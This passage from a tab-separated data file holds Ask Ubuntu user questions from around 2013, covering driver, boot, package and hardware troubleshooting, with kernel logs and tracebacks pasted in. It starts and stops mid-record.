10.926366 ] xc4000 1-0061 : destroying instance [ 10.926529 ] cx23885 [ 0 ] : registered device video0 [ v4l2 ] [ 10.926620 ] cx23885 [ 0 ] : registered device vbi0 [ 10.926827 ] cx23885 [ 0 ] : registered alsa audio device [ 10.930850 ] tuner 1-0061 : tuner has no way to set tv freq [ 10.942820 ] cx23885_dvb_register ( ) allocating 1 frontend ( s ) [ 10.942824 ] cx23885 [ 0 ] : cx23885 based dvb card [ 10.962568 ] xc4000 2-0061 : creating new instance [ 10.963291 ] xc4000 : successfully identified at address 0x61 [ 10.963293 ] xc4000 : firmware has not been loaded previously [ 10.971195 ] dvb : registering new adapter ( cx23885 [ 0 ] ) [ 10.971203 ] dvb : registering adapter 2 frontend 0 ( zarlink zl10353 dvb-t ) ... [ 10.971857 ] cx23885_dev_checkrevision ( ) hardware revision = 0xa4 [ 10.971865 ] cx23885 [ 0 ] /0 : found at 0000:02:00.0 , rev : 3 , irq : 18 , latency : 0 , mmio : 0xfe600000 [ 11.332565 ] dvb : registering adapter 1 frontend 0 ( realtek dvb-t rtl2832 ) ... [ 11.334180 ] input : ir-receiver inside an usb dvb receiver as /devices/pci0000:00/0000:00:04.0/0000:03:00.0/0000:04:00.2/usb4/4-2/input/input3 [ 11.334319 ] dvb-usb : schedule remote query interval to 287 msecs . [ 11.334324 ] dvb-usb : usb dvb-t device successfully initialized and connected . [ 11.334357 ] dvb-usb : found a 'usb dvb-t device ' in warm state . [ 11.334371 ] dvb-usb : will pass the complete mpeg2 transport stream to the software demuxer . [ 11.336039 ] dvb : registering new adapter ( usb dvb-t device ) [ 11.355161 ] rtl2832u usb_init_bulk_setting : usb2.0 high speed ( 480mb/s ) [ 11.596933 ] rtl2832u check_tuner_type : fc0012 tuner on board ... [ 12.163908 ] dvb : registering adapter 3 frontend 0 ( realtek dvb-t rtl2832 ) ... [ 12.165480 ] input : ir-receiver inside an usb dvb receiver as /devices/pci0000:00/0000:00:04.0/0000:03:00.0/0000:04:00.2/usb4/4-3/input/input4 [ 12.165606 ] dvb-usb : schedule remote query interval to 287 msecs . [ 12.165613 ] dvb-usb : usb dvb-t device successfully initialized and connected . [ 12.165647 ] dvb-usb : found a 'usb dvb-t device ' in warm state . [ 12.165658 ] dvb-usb : will pass the complete mpeg2 transport stream to the software demuxer . [ 12.167379 ] dvb : registering new adapter ( usb dvb-t device ) [ 12.185508 ] rtl2832u usb_init_bulk_setting : usb2.0 high speed ( 480mb/s ) [ 12.425785 ] rtl2832u check_tuner_type : fc0012 tuner on board ... [ 12.995998 ] dvb : registering adapter 4 frontend 0 ( realtek dvb-t rtl2832 ) ... [ 12.996640 ] input : ir-receiver inside an usb dvb receiver as /devices/pci0000:00/0000:00:04.0/0000:03:00.0/0000:04:00.2/usb4/4-4/input/input5 [ 12.997422 ] dvb-usb : schedule remote query interval to 287 msecs . [ 12.997428 ] dvb-usb : usb dvb-t device successfully initialized and connected . [ 12.997463 ] usbcore : registered new interface driver dvb_usb_rtl2832u here is the output from lspci : sudo lspci -v -d 14f1:8852 02:00.0 multimedia video controller : conexant systems , inc. cx23885 pci video and audio decoder ( rev 03 ) subsystem : leadtek research inc. device 6f39 flags : bus master , fast devsel , latency 0 , irq 18 memory at fe600000 ( 64-bit , non-prefetchable ) [ size=2m ] capabilities : [ 40 ] express endpoint , msi 00 capabilities : [ 80 ] power management version 2 capabilities : [ 90 ] vital product data capabilities : [ a0 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ 100 ] advanced error reporting capabilities : [ 200 ] virtual channel kernel driver in use : cx23885 kernel modules : cx23885
305507	problem downloading origin ea please help	ok i 'm really getting angry ! i wan na play a computer game ( sims 3 ) but i have to download origin first so i could play but it says this . -- -- - archive : /home/*****/downloads/originthinsetup ( 1 ) .exe [ /home/*****/downloads/originthinsetup ( 1 ) .exe ] end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . zipinfo : can not find zipfile directory in one of /home/*****/downloads/originthinsetup -- -- -- can someone explain in a way i can understand , what i can do to be able to play my game ? i 'm so confused and i just want to play a game .
305508	converting my c : \ to ntfs from ext4	i was playing with my computer attempting to install ubuntu 12.04.2 lts i386 , and i accidentally converted my c : \ with windows on it to ext4 , and windows hangs on boot . all of windows is still on the drive , along with the files , but i really want to use windows again . all i need to know is how to convert back to ntfs without losing windows . any help would be appreciated .
305513	bash : file not found	thats all on the screenshot.sorry for pt-br .
305517	fixing a messed up music library	i was editing the information in my library in rhythmbox , and everything got royally messed up somehow . many song titles , artists , and albums are completely wrong . i 'm wondering if there 's an way i can fix the properties automatically , like windows media player allows with it 's album database comparison thing .
305519	the analog of krusader	i 'm using krusader as a file manager , however it sometimes works too slow and that 's why i 'm looking for another one which is lighter and quicker . i like the rich functionality krusader has and i 'd like another one has it also .
305523	can not get nvidia drivers to work	i have tried everything and literally followed this tutorial : http : //www.dedoimedo.com/computers/ubuntu-quetzal-nvidia.html 10 times from top to bottom and i still ca n't get my nvidia drivers installed . i am running ubuntu 13.04 . it should be noted that when i type : lsmod|grep nvidia i get an output of : nvidia 11309139 0 i can still see the screen , as stated in my other question , and i can still interact with folders on my desktop and open terminal . my screen looks like this : that is all i see , and i 'm thrown constant `` ubuntu has experienced a severe problem '' and then i am asked to send logs from nvidia . so , i 'm guessing it is installed .
305524	configuring open fire server in ubuntu	i have installed open fire 3.8.1 in my system . i have also enabled the monitoring service plugin by jive software . it logs all the conversations in the database . few days back some one have changed the settings and now the conversations are not recorded in the database . how to re-enable open fire to store chat logs ?
305526	how to find the device name of an hdd that wo n't mount ?	i have a failing hdd that i want to recover data from , using ddrescue . however , i do n't know how to find the device name . when i booted ubuntu with the disk plugged in , ubuntu seemed to get stuck trying to read the drive and seemed to be getting nowhere after 10mins . i rebooted with the disk unplugged , and plugged its sata cable in once the system had finished booting . how can i find out what the device name is ?
305527	software can not be verified warning	i am running ubuntu 13.04 with kde . today , software update notification indicated security updates containing updates to libfs6 , libx11-6 , libx11-data , etc . when proceed with the updates , it asks for my password and then gives a message : the following pieces of software can not be verified . warning : installing unverified software represents a security risk , as the presence of unverifiable software can be a sign of tampering . do you wish to continue/ cancel i have , of course , canceled updates . what could be the issue/ how do i set it right ? more importantly , is my system hacked/ compromised ?
305528	windows 7/ubuntu 13.04 dual boot woes	i tried dual-booting windows/ubuntu . i first set up partitions using gparted : /dev/sda1 ext4 ubuntu primary /dev/sda2 ntfs windows primary /dev/sda3 ntfs data primary /dev/sda5 swap swap logical ( in /dev/sda4 extended ) their physical order on disk is the same . i have n't given the size as i do n't think it matters . then i installed ubuntu ( with the bootloader in /dev/sda ) , then windows ( in /dev/sda2 ) . i tried to use easybcd to boot into ubuntu ( added an entry ) . no dice . used a live cd to do this ( i had to use the -- force flag , something about blocks ) using the windows bootloader as main , then re-created the entry , and wrote the bootloader to mbr for good measure . still does n't work . i want to use the win7 bootloader as main . all i get each time when i select ubuntu is this ( written in a dos font ) : try ( hd0,0 ) : ext2 : _ , where the underscore is a blinking cursor .
305530	how to use change directory in zenity ?	how to use cd command for change directory in zenity , my simple script like this # ! /bin/bash a=`zenity -- entry -- entry-text= '' input directory name '' ` cd $ a but , when cd [ the cd ( changedirectory ) command will change from your current directory to any directory you specify ] command change to rmdir/mkdir , its work perfect.. please help me..
305534	ubuntu jumps folders when saving files	whenever i want to save a file in a directory that has 1 sub folder , ubuntu has this really annoying habit of jumping into that folder when i click save and i specifically ask it to save in the first directory above the sub folder that 's there . i notice this little issue when saving screenshots too , i tested this out when saving a screenshot to the desktop while just having 1 new empty folder there , i click to save on just the desktop from the screenshot save dialogue box , but it jumps into that folder to save it . i want to know how i can stop ubuntu from doing this because it 's quite annoying sometimes when i just want it to save to the directory i tell it , and not the other directory folder it thinks it should be saving to .
305540	how can i add my free font to ubuntu repositories ?	how can i can share my freeware font with ubuntu users ? is there a way to make a package , or change an existing package to include the font i 've designed ? here is a gzipped archive with the font : labiryntowy_pl.tgz it includes a rendering of font output to pdf , as well as the .ttf file : here is part of the description ( translated from polish via google ) : font labiryntowy_pl created as a practical realization of the idea of ââthe alphabet labyrinth . this font contains over 300 ligatures and most of the characters needed to complete the titles and monograms . latest version font : 1.52 the latest version on the website . font is released under freeware license . ( c ) copyright by jacek szewczyk a.d. 2008-2012
305549	if i download steam on ubuntu , does that mean i can play any game i get on steam on ubuntu ?	this question may or may not be very stupid , as i am kind of ignorant when it comes to computers . my friend has convinced me to switch to linux , and i 'm trying to figure out how i can game on it .
305553	administrator privelege	i just recently installed lubuntu in virtual box and when i tried to install virtual box guest additions , it says that it requires administrative priveleges . so how do i run this program as admin ? i am new to linux so please help .
305554	disk space used up	i have upgraded to 13.04 and lose disk space , ... i have a 3 tb hard disk , and had yesterday still 890 gb free , ... today all is gone ! disk usage analyzer does not give me a clue and says that it could not read all directories due to missing permission . how can i start it as root , believing that this would give me all permissions . log files dont show me also anything useful for that matter . thanks for your hints .
305558	where is downloaded package files directory ?	need to know where downloaded packages will be saved after updating ? i want to copy the folder of packages , and reinstall linux and install the packages without downloading them again , so i need packages file . am i allowed to do this and how ? thanks ; my ubuntu linux version : 12.10 32bit
305561	diagnose ubuntu 12.10 ( in dual 12.04-12.10 boot )	i find that my acer aspire one d270 netbook ( intel atom cpu , 2gb ddr3 memory ) shows a blank screen with a blinking cursor if i tried booting 12.10 from the bootable usb stick . in fact once , i clicked the `` try from cd '' button , saw the blank screen for a while and had dozed off for an hour only to wake up and see the same blank screen again . then i installed it alongside my ubuntu 12.04 ( 64-bit os ) and on booting 12.10 , the same blank screen shows up and keeps me indefinitely waiting , until i run out of patience and press the power button , restart and boot my 12.04 . how do i correct this ? here 's what i found the last few lines to be , on scrutinising the problem via ctrlalt1 as our friend here suggests : mountall : plymouth command failed mountall : plymouth command failed mountall : plymouth command failed mountall : plymouth command failed mountall : disconnected from plymouth
305567	ubuntu 13.04 with old ( radeon hd 4850 ) graphic card	i 've just installed ubuntu 13.04 and i think i may have issues with the graphic card . its fan is just running very fast ( and noisy ) . i tried to check the temperature using sensors and got the following : coretemp-isa-0000 adapter : isa adapter core 0 : +48.0°c ( high = +84.0°c , crit = +100.0°c ) core 1 : +47.0°c ( high = +84.0°c , crit = +100.0°c ) core 2 : +46.0°c ( high = +84.0°c , crit = +100.0°c ) core 3 : +47.0°c ( high = +84.0°c , crit = +100.0°c ) it8718-isa-0290 adapter : isa adapter in0 : +1.12 v ( min = +0.00 v , max = +4.08 v ) in1 : +1.89 v ( min = +0.00 v , max = +4.08 v ) in2 : +3.30 v ( min = +0.00 v , max = +4.08 v ) +5v : +2.99 v ( min = +0.00 v , max = +4.08 v ) in4 : +0.45 v ( min = +0.00 v , max = +4.08 v ) in5 : +0.11 v ( min = +0.00 v , max = +4.08 v ) in6 : +0.10 v ( min = +0.00 v , max = +4.08 v ) in7 : +3.20 v ( min = +0.00 v , max = +4.08 v ) vbat : +3.28 v fan1 : 0 rpm ( min = 0 rpm ) fan2 : 0 rpm ( min = 0 rpm ) fan3 : 477 rpm ( min = 0 rpm ) fan4 : 0 rpm ( min = 0 rpm ) temp1 : +44.0°c ( low = +127.0°c , high = +127.0°c ) sensor = thermistor temp2 : +43.0°c ( low = +127.0°c , high = +127.0°c ) sensor = thermal diode temp3 : -2.0°c ( low = +127.0°c , high = +127.0°c ) sensor = thermistor intrusion0 : alarm radeon-pci-0100 adapter : pci adapter temp1 : +113.0°c iiuc - the temperature is 113.0c is this a normal temperature ? is this why the fan is running fast ? until yesterday i had windows 7 on this same machine and i have n't had any problems with the gpu fan . might be a drivers issue , i tried to install the driver for amd/ati web site and failed ( something about required packages missing - checked the logs to see what is missing and found out it is installed ) . i 'd appreciate any help here . thanks , itay
305574	install ati radeon 2400 hd pro on ubuntu 13.04	could anyone help me , please , to install an ati radeon 2400 hd pro on my ubuntu 13.04 ? i tried using the info from this site http : //www.noobslab.com/2013/04/install-ati-amd-catalyst-drivers-in.html . but it says is not compatible , so i was thinking if there is another way . i 'm a begginer in using ubuntu , so if anyone could help me , it would be great . thanks
305577	how do i speed up my performance on my ubuntu 13.04 virtualbox virtual machine ?	i 'm having trouble using my ubuntu vm ( virtual machine ) . here is all the information shown on my virtualbox manager : general : name : ubuntu 13.04 i operating system : ubuntu system : base memory : 512 mb i boot order : floppy , cd/dvd-rom , hard disk i acceleration : vt-x/amx-v , nested paging , pae/nx display : video memory : 12 mb i remote desktop server : disabled storage : contoller : ide , ide secondary master : [ cd/dvd ] ubuntu-13.04-desktop-i1386.iso ( 794.00 mb ) ( note that this is a .iso image stored on my macbook running mac os x lion ) i controller : sata , sata port 0 : ubuntu 13.04.vdi ( normal , 8.00 gb ) vdi stands for virtual disk image audio : host driver : coreaudio i controller : ich ac97 ( a friendly notice that my speakers are n't working at the moment ) network : adapter 1 : intel pro/1000 mt desktop ( nat ) usb : device filters : 0 shared folders : none description : slowbuntu 13.04 , the slowest ubuntu yet i warning : this version of ubuntu is too noisy and slow for approval . ( i made that up to describe how slow this virtualbox vm is ) i 've also got some information about my current computer : operating system : mac os x lion ( version 10.7.5 ) i macbook early 2008 white i processor : 2.4 ghz intel core 2 duo i memory : 4 gb 667 mhz ddr2 sdram i tm and âš 1983 - 2012 apple inc. all rights reserved . licence agreement if you 've got a suggestion/solution , please reply and i will check if it 's work . i ca n't open a application when clicking on it , and it 's super slow with effects . please forget about typos because this was made manually . i got the mac from my uncle . adrian .
305582	safe to install nautilus 3.6 in ubuntu 12.04 lts ?	i tried installing the new nautilus via commands sudo add-apt-repository ppa : gnome3-team/gnome3 sudo apt-get update sudo apt-get install nautilus but the console warns me not to do that : you are about to add the following ppa to your system : before upgrading your system to a new ubuntu release ( i.e . from ubuntu 12.04 to 13.04 ) , you should probably run ppa-purge ppa : gnome3-team/gnome3 first . === ubuntu 13.04 ( raring ) === gnome 3.8 that wo n't make it into the normal ubuntu 13.04 repositories . other parts of gnome 3.8 are available in the https : //launchpad.net/~gnome3-team/+archive/gnome3-staging ppa but beware that many of those components have known regressions from their gnome 3.6 versions . you need to run 'sudo apt-get dist-upgrade ' to avoid problems . please read the output before entering 'y ' to make sure important packages wo n't be removed . === ubuntu 12.10 ( quantal ) === parts of gnome 3.6 that did n't make it into the normal ubuntu 12.10 repositories . === ubuntu 12.04 ( precise ) === parts of gnome 3.4 that did n't make it into the normal ubuntu 12.04 repositories . === bugs === on raring ( 13.04 ) please use 'ubuntu-bug ' to report bugs against packages in this ppa more info : https : //launchpad.net/~gnome3-team/+archive/gnome3 press [ enter ] to continue or ctrl-c to cancel adding it so , is it safe to install nautilus 3.6 on ubuntu 12.04 ? has anyone tried and did any problems appear ?
305583	i can authenticate but can not login in using my password ?	here is my story : there were days when i had my password and everything was fine . i removed my password : opened user accounts unlocked it by pressing `` unlock '' button selected my username ( btw , i have only one user which is administrator user ) chose `` login without password '' pressed `` change '' button and some day there came a trouble i needed to authenticate ( as i had no password i could not authenticate ) using startup disk creator wrote ubuntu 12.04 to a usb . i `` tried ubuntu '' mounted my ubuntu 's filesystem ( not try ubuntu 's ) in terminal run gksu nautilus ( no authentication was necessary ) opened etc/shadow file , and removed some_encrypted_text from this line : wicked6 : some_encrypted_text:15864:0:99999:7 : : : rebooted and opened my ubuntu in terminal run passwd myusername and changed my password i got the message passwd : password updated successfully i can use this password for authentication but not for logging in by pressing login button ( i can log in directly on first log in { remember that i had used login without password } . but when i lock my screen i need to press switch user and then press login , because when i enter my password it does not accept it ) please do n't advice me to reinstall ubuntu , because i do n't want . help me to login in on lock screen . thanks in advance . p.s . i am using ubuntu 12.04 : - )
305584	how could i boot my installation of ubuntu 13.04 in ram ?	just like in the live cd using squashfs of the system . i think that it could boost the general speed of the whole os by putting it on the ram . this wiki is outdated , maybe : https : //wiki.ubuntu.com/boottoram ps : i do n't worry about persistence ( even ram ) i will create a script that could run as a shutdown script to sync my files to the partition .
305593	mysql broken packages	i am not able to fix broken packages to my ubuntu machine . i followed many command posted on forums . nothing happened ! the packages that have the problem are : mysql-server-5.5 mysql-server any way to resolve it ? the configuration of my pc is in greek language and i ca n't give you some useful output since this problem prevents me from changing the language of console ! thank you ! ok , here is the output ! unknown @ unknown-pc : ~ $ sudo apt-get install -- reinstall mysql-server-5.5 mysql-server-5.5 [ sudo ] password for unknown : reading package lists ... done building dependency tree reading state information ... done suggested packages : tinyca mailx the following packages will be upgraded : mysql-server-5.5 1 upgraded , 0 newly installed , 0 to remove and 47 not upgraded . 2 not fully installed or removed . need to get 0 b/8746 kb of archives . after this operation , 0 b of additional disk space will be used . preconfiguring packages ... ( reading database ... 366372 files and directories currently installed . ) preparing to replace mysql-server-5.5 5.5.31-0ubuntu0.12.04.1 ( using ... /mysqlserver-5.5_5.5.31-0ubuntu0.12.04.2_i386.deb ) ... invoke-rc.d : unknown initscript , /etc/init.d/mysql not found . dpkg : warning : subprocess old pre-removal script returned error exit status 100 dpkg - trying script from the new package instead ... invoke-rc.d : unknown initscript , /etc/init.d/mysql not found . dpkg : error processing /var/cache/apt/archives/mysql-server-5.5_5.5.31-0ubuntu0.12.04.2_i386.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 100 no apport report written because maxreports is reached already invoke-rc.d : unknown initscript , /etc/init.d/mysql not found . invoke-rc.d : unknown initscript , /etc/init.d/mysql not found . dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 100 errors were encountered while processing : /var/cache/apt/archives/mysql-server-5.5_5.5.31-0ubuntu0.12.04.2_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) unknown @ unknown-pc : ~ $
305594	ubuntu design website duplication	why ubuntu maintaining two website for the same purpose . one is http : //design.ubuntu.com and another one is http : //design.canonical.com .
305601	chinese does n't display in ubuntu with chromebook pixel	i install ubuntu ( unity as desktop ) alongside with chrome os for my chromebook pixel , following the instructions on this webpage : http : //www.maketecheasier.com/install-ubuntu-on-chromebook/2013/05/14 the chinese characters do n't display correctly anywhere , though the chinese language support has been installed . the chinese characters do n't show up in web pages , they do not even show up in the language support panel . i have no idea how to fix this . could anyone help me fixing it ? thanks .
305607	conky problem blackscreen	i 've installed conky on my computer following these steps from this website http : //www.noobslab.com/2012/06/install-conky-lua-in-ubuntulinux.html . but i 've done all i got is a little black screen in the left of my desktop : / please can someone help or show me how to remove conky from my computer to try something else.. i uploaded a photo to show you guys what i 'm talking about . this is my desktop with the problem on it :
305614	i installed lubuntu on a different partition but on the same drive as windows 7 and no boot menu	after i installed lubuntu , computer boots directly to windows 7 and its not showing the boot menu . now i have access to windows only . during the installation i choose to install it on different partition and the boot file location i set it to the same partition i installed lubuntu on and its not the partition that windows is installed in . windows on partition == > sda1 and windows boot loader as well is here . lubuntu and its boot loader == > sda7 . what shall i do now ? re-install lubuntu ?
305617	ubuntu software center crashes due to error in its python code	i searched for that , but did not find any reference to it on this site . if you know some , please refer me to it - the issues i have seen have different symptoms . so , to the point ... i had ubuntu 12.04 lts for a long time , switched to ubuntu gnome shell etc . recently i wanted to move to ubuntu 13.04 and found an issue that seemingly occurred previously , but at seemingly random rate . now i can not start ubuntu software center at all . when i run the console i see : $ software-center ( process:22270 ) : gtk-warning ** : locale not supported by c library . using the fallback 'c ' locale . traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 36 , in < module > from softwarecenter.utils import ( file `` /usr/share/software-center/softwarecenter/utils.py '' , line 47 , in < module > from config import get_config file `` /usr/share/software-center/softwarecenter/config.py '' , line 33 , in < module > class softwarecenterconfig ( object , safeconfigparser ) : file `` /usr/lib/python2.7/abc.py '' , line 87 , in __new__ cls = super ( abcmeta , mcls ) .__new__ ( mcls , name , bases , namespace ) typeerror : error when calling the metaclass bases can not create a consistent method resolution order ( mro ) for bases safeconfigparser , object i hoped that following these ideas ( source ) could be helpful : $ sudo apt-get purge software-center $ sudo apt-get update $ sudo apt-get dist-upgrade $ sudo apt-get install software-center $ sudo dpkg-reconfigure software-center -- force it was not : $ sudo apt-get purge software-center reading package lists ... done building dependency tree reading state information ... done the following package was automatically installed and is no longer required : software-center-aptdaemon-plugins use 'apt-get autoremove ' to remove it . the following packages will be removed : software-center* 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_us.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory ( reading database ... 269627 files and directories currently installed . ) removing software-center ... purging configuration files for software-center ... rmdir : failed to remove `/var/cache/software-center/xapian/ ' : no such file or directory dpkg : error processing software-center ( -- purge ) : subprocess installed post-removal script returned error exit status 1 errors were encountered while processing : software-center e : sub-process /usr/bin/dpkg returned an error code ( 1 ) what am i doing wrong ? how can i get rid of ubuntu software center causing error and install version that will not have that ? or maybe the problem is with my python interpreter ? $ python -- version python 2.7.3 i believe ubuntu is gradually moving to tools working on python 3.x only , but is that the cause ? thanks for all the tips . i strongly believe it may be also helpful for the others . update 1. : the first update went from 12.04 to 12.10 , and i did not notice it did not reach 13.04 . as soon as i noticed , i upgraded from 12.10 to 13.04 . the problem however did not disappear . i also did what thefourtheye asked : $ sudo locale-gen generating locales ... en_us.utf-8 ... up-to-date generation complete . and this is the result of trying to do the purge : $ sudo apt-get purge software-center reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : python-oneconf software-center-aptdaemon-plugins use 'apt-get autoremove ' to remove them . the following packages will be removed : software-center* 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 279036 files and directories currently installed . ) removing software-center ... purging configuration files for software-center ... rmdir : failed to remove ‘/var/cache/software-center/xapian/’ : no such file or directory dpkg : error processing software-center ( -- purge ) : subprocess installed post-removal script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : software-center e : sub-process /usr/bin/dpkg returned an error code ( 1 ) update 2. : another debug information ( requested by nickguletskii ) : $ cat /etc/environment path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games '' and $ sudo apt-get install language-pack-en reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : firefox-locale-en language-pack-en-base the following new packages will be installed : firefox-locale-en language-pack-en language-pack-en-base 0 upgraded , 3 newly installed , 0 to remove and 0 not upgraded . need to get 1,372 kb of archives . after this operation , 4,874 kb of additional disk space will be used . do you want to continue [ y/n ] ? get:1 http : //security.ubuntu.com/ubuntu/ raring-security/main firefox-locale-en amd64 21.0+build2-0ubuntu0.13.04.2 [ 549 kb ] get:2 http : //archive.ubuntu.com/ubuntu/ raring/main language-pack-en-base all 1:13.04+20130418 [ 822 kb ] get:3 http : //archive.ubuntu.com/ubuntu/ raring/main language-pack-en all 1:13.04+20130418 [ 1,968 b ] fetched 1,372 kb in 2s ( 521 kb/s ) selecting previously unselected package language-pack-en-base . ( reading database ... 279503 files and directories currently installed . ) unpacking language-pack-en-base ( from ... /language-pack-en-base_1 % 3a13.04+20130418_all.deb ) ... selecting previously unselected package language-pack-en . unpacking language-pack-en ( from ... /language-pack-en_1 % 3a13.04+20130418_all.deb ) ... selecting previously unselected package firefox-locale-en . unpacking firefox-locale-en ( from ... /firefox-locale-en_21.0+build2-0ubuntu0.13.04.2_amd64.deb ) ... processing triggers for software-center ... error : root : debfileapplication import traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/__init__.py '' , line 4 , in < module > from debfile import debfileapplication , debfileopenerror file `` /usr/share/software-center/softwarecenter/db/debfile.py '' , line 25 , in < module > from softwarecenter.db.application import application , appdetails file `` /usr/share/software-center/softwarecenter/db/application.py '' , line 28 , in < module > import softwarecenter.distro file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 26 , in < module > from softwarecenter.utils import unimplementederror , utf8 file `` /usr/share/software-center/softwarecenter/utils.py '' , line 48 , in < module > from config import get_config file `` /usr/share/software-center/softwarecenter/config.py '' , line 33 , in < module > class softwarecenterconfig ( object , safeconfigparser ) : file `` /usr/lib/python2.7/abc.py '' , line 87 , in __new__ cls = super ( abcmeta , mcls ) .__new__ ( mcls , name , bases , namespace ) typeerror : error when calling the metaclass bases can not create a consistent method resolution order ( mro ) for bases object , safeconfigparser traceback ( most recent call last ) : file `` /usr/sbin/update-software-center '' , line 38 , in < module > from softwarecenter.db.update import rebuild_database file `` /usr/share/software-center/softwarecenter/db/update.py '' , line 33 , in < module > from softwarecenter.backend.scagent import softwarecenteragent file `` /usr/share/software-center/softwarecenter/backend/scagent.py '' , line 28 , in < module > from softwarecenter.distro import get_distro , get_current_arch file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 26 , in < module > from softwarecenter.utils import unimplementederror , utf8 file `` /usr/share/software-center/softwarecenter/utils.py '' , line 48 , in < module > from config import get_config file `` /usr/share/software-center/softwarecenter/config.py '' , line 33 , in < module > class softwarecenterconfig ( object , safeconfigparser ) : file `` /usr/lib/python2.7/abc.py '' , line 87 , in __new__ cls = super ( abcmeta , mcls ) .__new__ ( mcls , name , bases , namespace ) typeerror : error when calling the metaclass bases can not create a consistent method resolution order ( mro ) for bases object , safeconfigparser setting up firefox-locale-en ( 21.0+build2-0ubuntu0.13.04.2 ) ... setting up language-pack-en ( 1:13.04+20130418 ) ... setting up language-pack-en-base ( 1:13.04+20130418 ) ... generating locales ... en_ag.utf-8 ... done en_au.utf-8 ... done en_bw.utf-8 ... done en_ca.utf-8 ... done en_dk.utf-8 ... done en_gb.utf-8 ... done en_hk.utf-8 ... done en_ie.utf-8 ... done en_in.utf-8 ... done en_ng.utf-8 ... done en_nz.utf-8 ... done en_ph.utf-8 ... done en_sg.utf-8 ... done en_us.utf-8 ... up-to-date en_za.utf-8 ... done en_zm.utf-8 ... done en_zw.utf-8 ... done generation complete . processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... update 3. : after following advice of nickguletskii i am getting this : $ cat /etc/environment path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games '' lc_numeric= '' en_us.utf-8 '' lc_time= '' en_us.utf-8 '' lc_monetary= '' en_us.utf-8 '' lc_paper= '' en_us.utf-8 '' lc_identification= '' en_us.utf-8 '' lc_name= '' en_us.utf-8 '' lc_address= '' en_us.utf-8 '' lc_telephone= '' en_us.utf-8 '' lc_measurement= '' en_us.utf-8 '' language= '' en_us : en_us : en '' lang= '' en_us.utf-8 '' $ software-center traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 36 , in < module > from softwarecenter.utils import ( file `` /usr/share/software-center/softwarecenter/utils.py '' , line 48 , in < module > from config import get_config file `` /usr/share/software-center/softwarecenter/config.py '' , line 33 , in < module > class softwarecenterconfig ( object , safeconfigparser ) : file `` /usr/lib/python2.7/abc.py '' , line 87 , in __new__ cls = super ( abcmeta , mcls ) .__new__ ( mcls , name , bases , namespace ) typeerror : error when calling the metaclass bases can not create a consistent method resolution order ( mro ) for bases object , safeconfigparser $ sudo apt-get purge software-center reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : software-center* 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . after this operation , 3,588 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 280103 files and directories currently installed . ) removing software-center ... purging configuration files for software-center ... rmdir : failed to remove ‘/var/cache/software-center/xapian/’ : no such file or directory dpkg : error processing software-center ( -- purge ) : subprocess installed post-removal script returned error exit status 1 processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for hicolor-icon-theme ... processing triggers for man-db ... errors were encountered while processing : software-center e : sub-process /usr/bin/dpkg returned an error code ( 1 ) $ sudo apt-get install software-center reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : software-center 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/442 kb of archives . after this operation , 3,588 kb of additional disk space will be used . selecting previously unselected package software-center . ( reading database ... 279639 files and directories currently installed . ) unpacking software-center ( from ... /software-center_5.6.0-0ubuntu3_all.deb ) ... processing triggers for man-db ... processing triggers for hicolor-icon-theme ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... setting up software-center ( 5.6.0-0ubuntu3 ) ... error : root : debfileapplication import traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/__init__.py '' , line 4 , in < module > from debfile import debfileapplication , debfileopenerror file `` /usr/share/software-center/softwarecenter/db/debfile.py '' , line 25 , in < module > from softwarecenter.db.application import application , appdetails file `` /usr/share/software-center/softwarecenter/db/application.py '' , line 28 , in < module > import softwarecenter.distro file `` /usr/share/software-center/softwarecenter/distro/__init__.py '' , line 26 , in < module > from softwarecenter.utils import unimplementederror , utf8 file `` /usr/share/software-center/softwarecenter/utils.py '' , line 48 , in < module > from config import get_config file `` /usr/share/software-center/softwarecenter/config.py '' , line 33 , in < module > class softwarecenterconfig ( object , safeconfigparser ) : file `` /usr/lib/python2.7/abc.py '' , line 87 , in __new__ cls = super ( abcmeta , mcls ) .__new__ ( mcls , name , bases , namespace ) typeerror : error when calling the metaclass bases can not create a consistent method resolution order ( mro ) for bases object , safeconfigparser traceback ( most recent call last ) : file `` /usr/sbin/update-software-center '' , line 38 , in < module > from softwarecenter.db.update import rebuild_database file `` /usr/share/software-center/softwarecenter/db/update.py '' , line 33 , in < module > from 